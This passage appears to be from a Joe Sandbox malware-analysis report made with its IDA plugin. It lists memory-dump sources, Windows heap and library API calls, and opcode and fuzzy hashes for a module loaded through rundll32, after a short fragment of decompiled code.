                  				goto 0x800082e1;
                  				r10d = 8;
                  				return r10d;
                  			}














                  0x1800081f0
                  0x1800081f5
                  0x1800081fa
                  0x180008213
                  0x18000821d
                  0x180008221
                  0x18000822a
                  0x180008236
                  0x18000823c
                  0x18000824b
                  0x180008253
                  0x180008260
                  0x180008264
                  0x180008268
                  0x18000826a
                  0x180008278
                  0x18000827e
                  0x180008284
                  0x18000828e
                  0x1800082b0
                  0x1800082b4
                  0x1800082ca
                  0x1800082cf
                  0x1800082d2
                  0x1800082d6
                  0x1800082d9
                  0x1800082db
                  0x180008300

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeapmemset
                  • String ID:
                  • API String ID: 609429373-0
                  • Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
                  • Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeaplstrlen
                  • String ID:
                  • API String ID: 2888080719-0
                  • Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
                  • Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
                  • memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
                  • String ID:
                  • API String ID: 2387776105-0
                  • Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
                  • Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeap_snprintflstrcpylstrlen
                  • String ID:
                  • API String ID: 2416262065-0
                  • Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
                  • Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$ErrorLast
                  • String ID:
                  • API String ID: 2332451156-0
                  • Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
                  • Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$AllocEnterHeapLeavememcpy
                  • String ID:
                  • API String ID: 224082080-0
                  • Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
                  • Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeaplstrlenmemcpymemset
                  • String ID:
                  • API String ID: 422472530-0
                  • Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
                  • Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700
                  Uniqueness

                  Uniqueness Score: -1.00%